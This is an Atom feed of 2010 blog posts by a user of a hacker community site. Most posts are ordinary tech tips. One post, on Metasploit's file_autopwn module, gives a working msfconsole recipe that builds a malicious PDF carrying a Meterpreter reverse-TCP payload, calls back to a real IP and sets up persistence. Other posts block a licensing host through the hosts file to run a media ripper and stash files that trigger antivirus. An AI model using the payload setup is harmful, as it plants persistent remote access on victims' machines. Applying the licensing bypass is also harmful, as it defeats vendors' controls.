<?xml version="1.0" encoding="utf-8"?>
        <feed xmlns="http://www.w3.org/2005/Atom">
            <title>Operat0r&#039;s Posts - House of Hackers</title>
            <link rel="self" href="http://houseofhackers.ning.com/profiles/blog/feed?user=3mw9fuxgilnah"/>
            <updated>2010-07-14T14:18:50Z</updated>
                            <author><name>operat0r</name></author>
                        <id>http://houseofhackers.ning.com/profiles/blog/feed?user=3mw9fuxgilnah</id>
                            <entry>
                    <title>Tutorial WIM image files wimfltr.sys Windows Image File Filter Driver command line install</title>
                    <link rel="alternate" href="http://houseofhackers.ning.com/xn/detail/2092781:BlogPost:245108"/>
                                        <id>tag:houseofhackers.ning.com,2010-07-14:2092781:BlogPost:245108</id>
                                        <updated>2010-07-14T14:00:00.000Z</updated>
                                        <author><name>operat0r</name></author>
                    <summary type="html">
                        Tutorial WIM image files wimfltr.sys Windows Image File Filter Driver command line install&lt;br/&gt;&lt;br/&gt;I have an H drive ( using junction to link C:\users\internet\Documents\my dropbox to h:\ ) I wanted to easly update files that triggerd AV so I zipped them up. I update the zip often and was testing for other options and this is what I tried.&lt;br/&gt;&lt;br/&gt;* h:\junction.exe -s &quot;C:\users\internet\Documents\my dropbox&quot; h: this is howto change location of dropbox sync :)&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;* google for the dri&amp;hellip;                    </summary>
                    <content type="html">
                        Tutorial WIM image files wimfltr.sys Windows Image File Filter Driver command line install&lt;br/&gt;&lt;br/&gt;I have an H drive ( using junction to link C:\users\internet\Documents\my dropbox to h:\ ) I wanted to easly update files that triggerd AV so I zipped them up. I update the zip often and was testing for other options and this is what I tried.&lt;br/&gt;&lt;br/&gt;* h:\junction.exe -s &quot;C:\users\internet\Documents\my dropbox&quot; h: this is howto change location of dropbox sync :)&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;* google for the drivers ImageX_x86 &lt;br/&gt;&lt;br/&gt;* install the driver&lt;br/&gt;rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128 .\ImageX_x86\wimfltr.inf&lt;br/&gt;&lt;br/&gt;* create an image of a DRIVE ( cannot be mapped drive OR junction &#039;ln for windows&#039; )&lt;br/&gt;.\ImageX_x86\imagex.exe /capture d:\ c:\twf.wim &quot;WIM Compress&quot; /compress maximum &lt;br/&gt;&lt;br/&gt;* umount image&lt;br/&gt;.\ImageX_x86\imagex.exe /unmount /commit c:\cygwin&lt;br/&gt;&lt;br/&gt;* mount image&lt;br/&gt;.\ImageX_x86\imagex.exe /mountrw .\cygwin.wim 1 c:\mount &lt;br/&gt; &lt;br/&gt;&lt;br/&gt;* even with &#039;maximum&#039; compresstion images are larger then the source files in most cases... ???&lt;br/&gt;* 80meg zip of Cygwin ~300 unzipped becomes 600 WIM file ???&lt;br/&gt;* requires admin rights to install drivers but still beats zipping and unzipping items that trigger AV&lt;br/&gt;reference: &lt;a href=&quot;http://technet.microsoft.com/en-us/library/cc749447%28WS.10%29.aspx&quot;&gt;http://technet.microsoft.com/en-us/library/cc749447%28WS.10%29.aspx&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;                    </content>
                                    </entry>
                            <entry>
                    <title>command line cheat sheet commandlinefu.com ripp / custom fu</title>
                    <link rel="alternate" href="http://houseofhackers.ning.com/xn/detail/2092781:BlogPost:228800"/>
                                        <id>tag:houseofhackers.ning.com,2010-07-01:2092781:BlogPost:228800</id>
                                        <updated>2010-07-01T13:00:00.000Z</updated>
                                        <author><name>operat0r</name></author>
                    <summary type="html">
                        &lt;span class=&quot;status-body&quot;&gt;&lt;span class=&quot;status-content&quot;&gt;&lt;span class=&quot;entry-content&quot;&gt;&lt;a href=&quot;http://rmccurdy.com/scripts/fu.txt&quot; class=&quot;tweet-url web&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://rmccurdy.com/scripts/fu.txt&lt;/a&gt;&lt;br/&gt;
commandlinefu.com ripp / custom fu&lt;br/&gt;&lt;br/&gt;huge list of *nix and windows &lt;br/&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;                    </summary>
                    <content type="html">
                        &lt;span class=&quot;status-body&quot;&gt;&lt;span class=&quot;status-content&quot;&gt;&lt;span class=&quot;entry-content&quot;&gt;&lt;a href=&quot;http://rmccurdy.com/scripts/fu.txt&quot; class=&quot;tweet-url web&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://rmccurdy.com/scripts/fu.txt&lt;/a&gt;&lt;br/&gt;
commandlinefu.com ripp / custom fu&lt;br/&gt;&lt;br/&gt;huge list of *nix and windows &lt;br/&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;                    </content>
                    <enclosure url="http://rmccurdy.com/scripts/fu.txt" type="text/plain"/>                </entry>
                            <entry>
                    <title>low on disk space android G1</title>
                    <link rel="alternate" href="http://houseofhackers.ning.com/xn/detail/2092781:BlogPost:226049"/>
                                        <id>tag:houseofhackers.ning.com,2010-06-12:2092781:BlogPost:226049</id>
                                        <updated>2010-06-12T16:30:00.000Z</updated>
                                        <author><name>operat0r</name></author>
                    <summary type="html">
                        find / -name traces.txt -exec rm -Rf {} \;&lt;br/&gt;&lt;br/&gt;something kept crashing while I was AFK and caused this traces file to get huGe&lt;br/&gt;                    </summary>
                    <content type="html">
                        find / -name traces.txt -exec rm -Rf {} \;&lt;br/&gt;&lt;br/&gt;something kept crashing while I was AFK and caused this traces file to get huGe&lt;br/&gt;                    </content>
                                    </entry>
                            <entry>
                    <title>imusic android &#039;stream&#039; ripper</title>
                    <link rel="alternate" href="http://houseofhackers.ning.com/xn/detail/2092781:BlogPost:223657"/>
                                        <id>tag:houseofhackers.ning.com,2010-05-27:2092781:BlogPost:223657</id>
                                        <updated>2010-05-27T13:54:10.000Z</updated>
                                        <author><name>operat0r</name></author>
                    <summary type="html">
                        &lt;a href=&quot;http://www.greencode.me/imusic&quot;&gt;http://www.greencode.me/imusic&lt;/a&gt;&lt;br/&gt;apk: &lt;a href=&quot;http://tinyurl.com/imusic1&quot;&gt;http://tinyurl.com/imusic1&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;                    </summary>
                    <content type="html">
                        &lt;a href=&quot;http://www.greencode.me/imusic&quot;&gt;http://www.greencode.me/imusic&lt;/a&gt;&lt;br/&gt;apk: &lt;a href=&quot;http://tinyurl.com/imusic1&quot;&gt;http://tinyurl.com/imusic1&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;                    </content>
                                    </entry>
                            <entry>
                    <title>McAfee 5958 Recovery Tool</title>
                    <link rel="alternate" href="http://houseofhackers.ning.com/xn/detail/2092781:BlogPost:216226"/>
                                        <id>tag:houseofhackers.ning.com,2010-05-04:2092781:BlogPost:216226</id>
                                        <updated>2010-05-04T18:48:48.000Z</updated>
                                        <author><name>operat0r</name></author>
                    <summary type="html">
                        &lt;p style=&quot;text-align: left;&quot;&gt;&lt;img style=&quot;width: 50%&quot; src=&quot;http://www.rmccurdy.com/public_images/McAfee_failsause.jpg&quot;/&gt;&lt;/p&gt;
&lt;br/&gt;&lt;a href=&quot;https://kc.mcafee.com/corporate/index?page=content&amp;amp;id=KB68815&quot;&gt;https://kc.mcafee.com/corporate/index?page=content&amp;amp;id=KB68815&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;                    </summary>
                    <content type="html">
                        &lt;p style=&quot;text-align: left;&quot;&gt;&lt;img style=&quot;width: 50%&quot; src=&quot;http://www.rmccurdy.com/public_images/McAfee_failsause.jpg&quot;/&gt;&lt;/p&gt;
&lt;br/&gt;&lt;a href=&quot;https://kc.mcafee.com/corporate/index?page=content&amp;amp;id=KB68815&quot;&gt;https://kc.mcafee.com/corporate/index?page=content&amp;amp;id=KB68815&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;                    </content>
                                    </entry>
                            <entry>
                    <title>dropbox portable any path without &quot;my dropbox&quot; in M$ ... DropboxDataWrapper DropboxPath FAILSAUSE</title>
                    <link rel="alternate" href="http://houseofhackers.ning.com/xn/detail/2092781:BlogPost:214600"/>
                                        <id>tag:houseofhackers.ning.com,2010-04-29:2092781:BlogPost:214600</id>
                                        <updated>2010-04-29T20:10:53.000Z</updated>
                                        <author><name>operat0r</name></author>
                    <summary type="html">
                        Requirements:&lt;br/&gt;&lt;br/&gt;* Administrator ( possibly for dropbox advanced options )&lt;br/&gt;* NTFS on the host computer !&lt;br/&gt;* BACKUP BEFORE YOU DO ANYTHING !!!&lt;br/&gt;&lt;br/&gt;Setup:&lt;br/&gt;&lt;br/&gt;* Download DROPBOX&lt;br/&gt;Recommended using the potable dropbox ICE because it has (UsbGuard (0.5.3) - Prevents Data Loss by killing DropBox.exe if you accidentally unplug your usb drive (included)&lt;br/&gt;DropBox Portable ICE 0.5.3 -SuPPoRT aLL DRoPBoX VeRSioNs | Updated : 11-04-2010&lt;br/&gt;&lt;br/&gt;&amp;hellip;                    </summary>
                    <content type="html">
                        Requirements:&lt;br/&gt;&lt;br/&gt;* Administrator ( possibly for dropbox advanced options )&lt;br/&gt;* NTFS on the host computer !&lt;br/&gt;* BACKUP BEFORE YOU DO ANYTHING !!!&lt;br/&gt;&lt;br/&gt;Setup:&lt;br/&gt;&lt;br/&gt;* Download DROPBOX&lt;br/&gt;Recommended using the potable dropbox ICE because it has (UsbGuard (0.5.3) - Prevents Data Loss by killing DropBox.exe if you accidentally unplug your usb drive (included)&lt;br/&gt;DropBox Portable ICE 0.5.3 -SuPPoRT aLL DRoPBoX VeRSioNs | Updated : 11-04-2010&lt;br/&gt;&lt;br/&gt;&lt;a href=&quot;http://dl.dropbox.com/u/5313411/Portable%20DropBox%20ICE%200.5.3.3%20%2B%20DropBox%200.8.32.rar&quot;&gt;http://dl.dropbox.com/u/5313411/Portable%20DropBox%20ICE%200.5.3.3%20%2B%20DropBox%200.8.32.rar&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;* Download Junction v1.05 from sysinternals “symbolic links, where a directory serves as a symbolic link to another directory on the computer.”&lt;br/&gt;* Start dropbox&lt;br/&gt;* Get the link to your dropbox folder path&lt;br/&gt;* Create the sym link to whatever path you like example&lt;br/&gt;rd /q/s &quot;C:\Documents and Settings\internet\My Documents\My Dropbox&quot;&lt;br/&gt;Junction.exe &quot;C:\Documents and Settings\internet\My Documents\My Dropbox&quot; h:\&lt;br/&gt;&lt;br/&gt;To delete a sym link use this command:&lt;br/&gt;Junction.exe -d &quot;C:\Documents and Settings\internet\My Documents\My Dropbox&quot;&lt;br/&gt;&lt;br/&gt;NOTES: there is a time tradeoff the dropbox.cache folder get queried a LOT and other I/O is sent to the target I would say for 16K files ~2gigs it took ~20-30min where as if it was just a read from the flash disk it would be under 10min&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;                    </content>
                                    </entry>
                            <entry>
                    <title>Mov_AMP_0.6.rar Mov&#039;AMP v0.6 Portable PHP Local Server portable AMP portable apache php mysql phpmyadmin</title>
                    <link rel="alternate" href="http://houseofhackers.ning.com/xn/detail/2092781:BlogPost:191013"/>
                                        <id>tag:houseofhackers.ning.com,2010-04-14:2092781:BlogPost:191013</id>
                                        <updated>2010-04-14T16:13:00.000Z</updated>
                                        <author><name>operat0r</name></author>
                    <summary type="html">
                        * yes flame on..&lt;br/&gt;* its old&lt;br/&gt;* only 10megs &lt;br/&gt;* run the apache.exe for debug not the gui .. &lt;br/&gt;&lt;a href=&quot;http://www.rmccurdy.com/scripts/downloaded/&quot;&gt;http://www.rmccurdy.com/scripts/downloaded/&lt;/a&gt; movamp.zip&lt;br/&gt;&lt;br/&gt;just find replace the path with your usb path in the httpd.conf and wala ! &lt;br/&gt;&lt;br/&gt;I think you could also use some %CD% &amp;gt; httpd.conf / sed/ awk and make it more portable if path changes etc ..&lt;br/&gt;&lt;br/&gt;                    </summary>
                    <content type="html">
                        * yes flame on..&lt;br/&gt;* its old&lt;br/&gt;* only 10megs &lt;br/&gt;* run the apache.exe for debug not the gui .. &lt;br/&gt;&lt;a href=&quot;http://www.rmccurdy.com/scripts/downloaded/&quot;&gt;http://www.rmccurdy.com/scripts/downloaded/&lt;/a&gt; movamp.zip&lt;br/&gt;&lt;br/&gt;just find replace the path with your usb path in the httpd.conf and wala ! &lt;br/&gt;&lt;br/&gt;I think you could also use some %CD% &amp;gt; httpd.conf / sed/ awk and make it more portable if path changes etc ..&lt;br/&gt;&lt;br/&gt;                    </content>
                                    </entry>
                            <entry>
                    <title>Millennium Falcon + Car = Fun</title>
                    <link rel="alternate" href="http://houseofhackers.ning.com/xn/detail/2092781:BlogPost:168620"/>
                                        <id>tag:houseofhackers.ning.com,2010-03-31:2092781:BlogPost:168620</id>
                                        <updated>2010-03-31T02:33:38.000Z</updated>
                                        <author><name>operat0r</name></author>
                    <summary type="html">
                        &lt;a href=&quot;http://www.flickr.com/photos/freeload101/4477410443&quot;&gt;http://www.flickr.com/photos/freeload101/4477410443&lt;/a&gt;                    </summary>
                    <content type="html">
                        &lt;a href=&quot;http://www.flickr.com/photos/freeload101/4477410443&quot;&gt;http://www.flickr.com/photos/freeload101/4477410443&lt;/a&gt;                    </content>
                                    </entry>
                            <entry>
                    <title>T-mobile heartbeat .. sortof ... twitter search &gt; tmobile &gt; atlanta &gt; nagios plugin ... LAME</title>
                    <link rel="alternate" href="http://houseofhackers.ning.com/xn/detail/2092781:BlogPost:165294"/>
                                        <id>tag:houseofhackers.ning.com,2010-03-29:2092781:BlogPost:165294</id>
                                        <updated>2010-03-29T16:30:00.000Z</updated>
                                        <author><name>operat0r</name></author>
                    <summary type="html">
                        cat ../../libexec/check_tmobile&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;&lt;br/&gt;#!/bin/bash&lt;br/&gt;export vartmobile1=`date &#039;+%Y-%m-%d&#039;`&lt;br/&gt;export vartmobile2=`links -dump &quot;http://search.twitter.com/search.atom?q=t-mobile+outage+atlanta+since%3A$vartmobile1&quot;|wc -l`&lt;br/&gt;export varflag=&quot;0&quot;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;if [[ &quot;$vartmobile2&quot; -gt &quot;3&quot; ]]&lt;br/&gt;then&lt;br/&gt;&lt;br/&gt;echo &quot;T-mobile outage ? &lt;a href=&quot;http://search.twitter.com/search.atom?q=t-mobile+outage+atlanta+since%3A&quot;&gt;http://search.twitter.com/search.atom?q=t-mobile+outage+atlanta+since&lt;/a&gt;&amp;hellip;                    </summary>
                    <content type="html">
                        cat ../../libexec/check_tmobile&lt;br/&gt;
&lt;br/&gt;
&lt;br/&gt;&lt;br/&gt;#!/bin/bash&lt;br/&gt;export vartmobile1=`date &#039;+%Y-%m-%d&#039;`&lt;br/&gt;export vartmobile2=`links -dump &quot;http://search.twitter.com/search.atom?q=t-mobile+outage+atlanta+since%3A$vartmobile1&quot;|wc -l`&lt;br/&gt;export varflag=&quot;0&quot;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;if [[ &quot;$vartmobile2&quot; -gt &quot;3&quot; ]]&lt;br/&gt;then&lt;br/&gt;&lt;br/&gt;echo &quot;T-mobile outage ? &lt;a href=&quot;http://search.twitter.com/search.atom?q=t-mobile+outage+atlanta+since%3A&quot;&gt;http://search.twitter.com/search.atom?q=t-mobile+outage+atlanta+since%3A&lt;/a&gt;$vartmobile1&quot;&lt;br/&gt;exit 2&lt;br/&gt;else&lt;br/&gt;echo No tweets on mobile outage atlanta today&lt;br/&gt;fi&lt;br/&gt;&lt;br/&gt;
&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;                    </content>
                                    </entry>
                            <entry>
                    <title>Zelda Twilight Princess 100% Complete download ripping</title>
                    <link rel="alternate" href="http://houseofhackers.ning.com/xn/detail/2092781:BlogPost:165022"/>
                                        <id>tag:houseofhackers.ning.com,2010-03-28:2092781:BlogPost:165022</id>
                                        <updated>2010-03-28T17:25:02.000Z</updated>
                                        <author><name>operat0r</name></author>
                    <summary type="html">
                        &lt;a href=&quot;http://www.youtube.com/view_play_list?p=21843B4E6D0B9821&quot;&gt;http://www.youtube.com/view_play_list?p=21843B4E6D0B9821&lt;/a&gt;&lt;br/&gt;&lt;a href=&quot;http://rmccurdy.com/scripts/downloaded/.apps/Replay%20Media%20Catcher%20v3.11.zip&quot;&gt;http://rmccurdy.com/scripts/downloaded/.apps/Replay%20Media%20Catcher%20v3.11.zip&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;close all windows:&lt;br/&gt;start &amp;gt; run &amp;gt;&lt;br/&gt;notepad c:\windows\system32\drivers\etc\hosts&lt;br/&gt;&lt;br/&gt;add 127.0.0.1 applian.securesites.com&lt;br/&gt;&lt;br/&gt;save and use firefox with Replay&amp;hellip;                    </summary>
                    <content type="html">
                        &lt;a href=&quot;http://www.youtube.com/view_play_list?p=21843B4E6D0B9821&quot;&gt;http://www.youtube.com/view_play_list?p=21843B4E6D0B9821&lt;/a&gt;&lt;br/&gt;&lt;a href=&quot;http://rmccurdy.com/scripts/downloaded/.apps/Replay%20Media%20Catcher%20v3.11.zip&quot;&gt;http://rmccurdy.com/scripts/downloaded/.apps/Replay%20Media%20Catcher%20v3.11.zip&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;close all windows:&lt;br/&gt;start &amp;gt; run &amp;gt;&lt;br/&gt;notepad c:\windows\system32\drivers\etc\hosts&lt;br/&gt;&lt;br/&gt;add 127.0.0.1 applian.securesites.com&lt;br/&gt;&lt;br/&gt;save and use firefox with Replay%20Media%20Catcher to download all the tutorials&lt;br/&gt;&lt;br/&gt;                    </content>
                                    </entry>
                            <entry>
                    <title>outerz0ne.org talks !</title>
                    <link rel="alternate" href="http://houseofhackers.ning.com/xn/detail/2092781:BlogPost:164291"/>
                                        <id>tag:houseofhackers.ning.com,2010-03-25:2092781:BlogPost:164291</id>
                                        <updated>2010-03-25T17:25:49.000Z</updated>
                                        <author><name>operat0r</name></author>
                    <summary type="html">
                        &lt;a href=&quot;http://www.archive.org/details/Outerz0ne2010Videos&quot;&gt;http://www.archive.org/details/Outerz0ne2010Videos&lt;/a&gt;                    </summary>
                    <content type="html">
                        &lt;a href=&quot;http://www.archive.org/details/Outerz0ne2010Videos&quot;&gt;http://www.archive.org/details/Outerz0ne2010Videos&lt;/a&gt;                    </content>
                                    </entry>
                            <entry>
                    <title>HP support call EPIC fail !</title>
                    <link rel="alternate" href="http://houseofhackers.ning.com/xn/detail/2092781:BlogPost:164093"/>
                                        <id>tag:houseofhackers.ning.com,2010-03-24:2092781:BlogPost:164093</id>
                                        <updated>2010-03-24T12:30:00.000Z</updated>
                                        <author><name>operat0r</name></author>
                    <summary type="html">
                        &lt;a href=&quot;http://www.rmccurdy.com/public_images/hp_is_teh_sux.mp3&quot;&gt;http://www.rmccurdy.com/public_images/hp_is_teh_sux.mp3&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;&#039;&lt;br/&gt;&lt;pre&gt;MSA is shwing a hard drive in leftover state&lt;br/&gt;&lt;br/&gt;-------------------------&lt;br/&gt;&lt;br/&gt;Resolution:&lt;br/&gt;Action Plan&lt;br/&gt;&lt;br/&gt;&lt;font size=&quot;5&quot;&gt;&lt;span style=&quot;font-weight: bold;&quot;&gt;1- Update the controller firmware version up to J210P22:&lt;/span&gt;&lt;/font&gt;&lt;/pre&gt;
&lt;br/&gt;&lt;pre&gt;Elguer Solano G.&lt;br/&gt;Storage Support Engineer&lt;br/&gt;SWD&lt;br/&gt;Hewlett-Packard Company&lt;br/&gt;&lt;br/&gt;&#039;&lt;/pre&gt;&amp;hellip;                    </summary>
                    <content type="html">
                        &lt;a href=&quot;http://www.rmccurdy.com/public_images/hp_is_teh_sux.mp3&quot;&gt;http://www.rmccurdy.com/public_images/hp_is_teh_sux.mp3&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;&#039;&lt;br/&gt;&lt;pre&gt;MSA is shwing a hard drive in leftover state&lt;br/&gt;&lt;br/&gt;-------------------------&lt;br/&gt;&lt;br/&gt;Resolution:&lt;br/&gt;Action Plan&lt;br/&gt;&lt;br/&gt;&lt;font size=&quot;5&quot;&gt;&lt;span style=&quot;font-weight: bold;&quot;&gt;1- Update the controller firmware version up to J210P22:&lt;/span&gt;&lt;/font&gt;&lt;/pre&gt;
&lt;br/&gt;&lt;pre&gt;Elguer Solano G.&lt;br/&gt;Storage Support Engineer&lt;br/&gt;SWD&lt;br/&gt;Hewlett-Packard Company&lt;br/&gt;&lt;br/&gt;&#039;&lt;br/&gt;&lt;a class=&quot;moz-txt-link-abbreviated&quot; href=&quot;mailto:solanoel@hp.com&quot;&gt;solanoel@hp.com&lt;/a&gt;&lt;a class=&quot;moz-txt-link-rfc2396E&quot; href=&quot;mailto:solanoel@hp.com&quot;&gt;&amp;lt;mailto:solanoel@hp.com&amp;gt;&lt;/a&gt;&lt;/pre&gt;
&lt;br/&gt;                    </content>
                    <enclosure url="http://www.rmccurdy.com/public_images/hp_is_teh_sux.mp3" type="video/mpeg"/>                </entry>
                            <entry>
                    <title>rmccurdy.com mashup of security feeds HUGE</title>
                    <link rel="alternate" href="http://houseofhackers.ning.com/xn/detail/2092781:BlogPost:163969"/>
                                        <id>tag:houseofhackers.ning.com,2010-03-23:2092781:BlogPost:163969</id>
                                        <updated>2010-03-23T20:21:27.000Z</updated>
                                        <author><name>operat0r</name></author>
                    <summary type="html">
                        did some more work with the feeds.&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;a href=&quot;http://pipes.yahoo.com/pipes/pipe.run?_id=5f1dcd4397142867d586ae88e192f796&amp;amp;_render=rss&quot;&gt;http://pipes.yahoo.com/pipes/pipe.run?_id=5f1dcd4397142867d586ae88e192f796&amp;amp;_render=rss&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;&lt;h4 class=&quot;permalink&quot;&gt;&lt;span id=&quot;perma5f1dcd4397142867d586ae88e192f796215532906&quot;&gt;src: &lt;a href=&quot;http://pipes.yahoo.com/rmccurdydotcom/security&quot;&gt;http://pipes.yahoo.com/rmccurdydotcom/security&lt;/a&gt;&lt;/span&gt;&lt;/h4&gt;
&lt;br/&gt;                    </summary>
                    <content type="html">
                        did some more work with the feeds.&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;a href=&quot;http://pipes.yahoo.com/pipes/pipe.run?_id=5f1dcd4397142867d586ae88e192f796&amp;amp;_render=rss&quot;&gt;http://pipes.yahoo.com/pipes/pipe.run?_id=5f1dcd4397142867d586ae88e192f796&amp;amp;_render=rss&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;&lt;h4 class=&quot;permalink&quot;&gt;&lt;span id=&quot;perma5f1dcd4397142867d586ae88e192f796215532906&quot;&gt;src: &lt;a href=&quot;http://pipes.yahoo.com/rmccurdydotcom/security&quot;&gt;http://pipes.yahoo.com/rmccurdydotcom/security&lt;/a&gt;&lt;/span&gt;&lt;/h4&gt;
&lt;br/&gt;                    </content>
                                    </entry>
                            <entry>
                    <title>multisnipe multi-snipe JBidwatcher</title>
                    <link rel="alternate" href="http://houseofhackers.ning.com/xn/detail/2092781:BlogPost:162503"/>
                                        <id>tag:houseofhackers.ning.com,2010-03-16:2092781:BlogPost:162503</id>
                                        <updated>2010-03-16T15:02:57.000Z</updated>
                                        <author><name>operat0r</name></author>
                    <summary type="html">
                        &lt;a href=&quot;http://www.jbidwatcher.com/help/multisniping&quot;&gt;http://www.jbidwatcher.com/help/multisniping&lt;/a&gt; &lt;br/&gt;                    </summary>
                    <content type="html">
                        &lt;a href=&quot;http://www.jbidwatcher.com/help/multisniping&quot;&gt;http://www.jbidwatcher.com/help/multisniping&lt;/a&gt; &lt;br/&gt;                    </content>
                                    </entry>
                            <entry>
                    <title>Metasploit auxilary module FILE_AUTOPWN</title>
                    <link rel="alternate" href="http://houseofhackers.ning.com/xn/detail/2092781:BlogPost:159666"/>
                                        <id>tag:houseofhackers.ning.com,2010-03-03:2092781:BlogPost:159666</id>
                                        <updated>2010-03-03T17:00:00.000Z</updated>
                                        <author><name>operat0r</name></author>
                    <summary type="html">
                        Metasploit auxilary file_autopwn module - Video Tutorial&lt;br/&gt;&lt;a href=&quot;http://www.backtrack-linux.org/forums/backtrack-videos/1843-metasploit-auxilary-file_autopwn-module-video-tutorial.html&quot;&gt;http://www.backtrack-linux.org/forums/backtrack-videos/1843-metasploit-auxilary-file_autopwn-module-video-tutorial.html&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;rm -Rf /tmp/1 &lt;br/&gt;mkdir /tmp/1 &lt;br/&gt;rm -Rf ~/.msf3&lt;br/&gt;&lt;br/&gt;wget -O /tmp/file3.pdf &lt;a href=&quot;https://www1.nga.mil/Newsroom/PressReleases/Press%20Releases/nga10_02.pdf&quot;&gt;htt&lt;/a&gt;&amp;hellip;                    </summary>
                    <content type="html">
                        Metasploit auxilary file_autopwn module - Video Tutorial&lt;br/&gt;&lt;a href=&quot;http://www.backtrack-linux.org/forums/backtrack-videos/1843-metasploit-auxilary-file_autopwn-module-video-tutorial.html&quot;&gt;http://www.backtrack-linux.org/forums/backtrack-videos/1843-metasploit-auxilary-file_autopwn-module-video-tutorial.html&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;rm -Rf /tmp/1 &lt;br/&gt;mkdir /tmp/1 &lt;br/&gt;rm -Rf ~/.msf3&lt;br/&gt;&lt;br/&gt;wget -O /tmp/file3.pdf &lt;a href=&quot;https://www1.nga.mil/Newsroom/PressReleases/Press%20Releases/nga10_02.pdf&quot;&gt;https://www1.nga.mil/Newsroom/PressReleases/Press%20Releases/nga10_02.pdf&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;./msfconsole&lt;br/&gt;&lt;br/&gt;db_driver sqlite3&lt;br/&gt;db_create pentest11&lt;br/&gt;# setting the LHOST to non IP can cause issues&lt;br/&gt;setg LHOST 75.139.158.51&lt;br/&gt;setg LPORT 21&lt;br/&gt;# I just need the files I dont care if the http server ever runs ..&lt;br/&gt;setg SRVPORT 21&lt;br/&gt;# defualt is 3333 &lt;br/&gt;setg LPORT_WIN32 21&lt;br/&gt;&lt;br/&gt;setg INFILENAME /tmp/file3.pdf&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;use auxiliary/server/file_autopwn&lt;br/&gt;&lt;br/&gt;set OUTPATH /tmp/1&lt;br/&gt;&lt;br/&gt;set URIPATH /msf&lt;br/&gt;set SSL true&lt;br/&gt;set ExitOnSession false&lt;br/&gt;set PAYLOAD windows/meterpreter/reverse_tcp&lt;br/&gt;setg PAYLOAD windows/meterpreter/reverse_tcp&lt;br/&gt;set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;run&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;                    </content>
                                    </entry>
                            <entry>
                    <title>To set up Yahoo mail E-Mail in Android</title>
                    <link rel="alternate" href="http://houseofhackers.ning.com/xn/detail/2092781:BlogPost:158521"/>
                                        <id>tag:houseofhackers.ning.com,2010-03-01:2092781:BlogPost:158521</id>
                                        <updated>2010-03-01T14:31:40.000Z</updated>
                                        <author><name>operat0r</name></author>
                    <summary type="html">
                        &lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;log-in to your yahoo mail&lt;br/&gt;
go to Options, then Account, followed by “Add or edit an account”&lt;br/&gt;
select “Account Information” on the left&lt;br/&gt;
on the &quot; Preferred Content,&quot; change it to Yahoo Asia&lt;br/&gt;
&lt;br/&gt;
&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&amp;hellip;                    </summary>
                    <content type="html">
                        &lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;log-in to your yahoo mail&lt;br/&gt;
go to Options, then Account, followed by “Add or edit an account”&lt;br/&gt;
select “Account Information” on the left&lt;br/&gt;
on the &quot; Preferred Content,&quot; change it to Yahoo Asia&lt;br/&gt;
&lt;br/&gt;
&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;ol style=&quot;list-style-type: decimal;&quot;&gt;
&lt;li&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;&lt;font face=&quot;Courier New, Courier, mono&quot;&gt;Make sure Wi-Fi is turned off&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/li&gt;
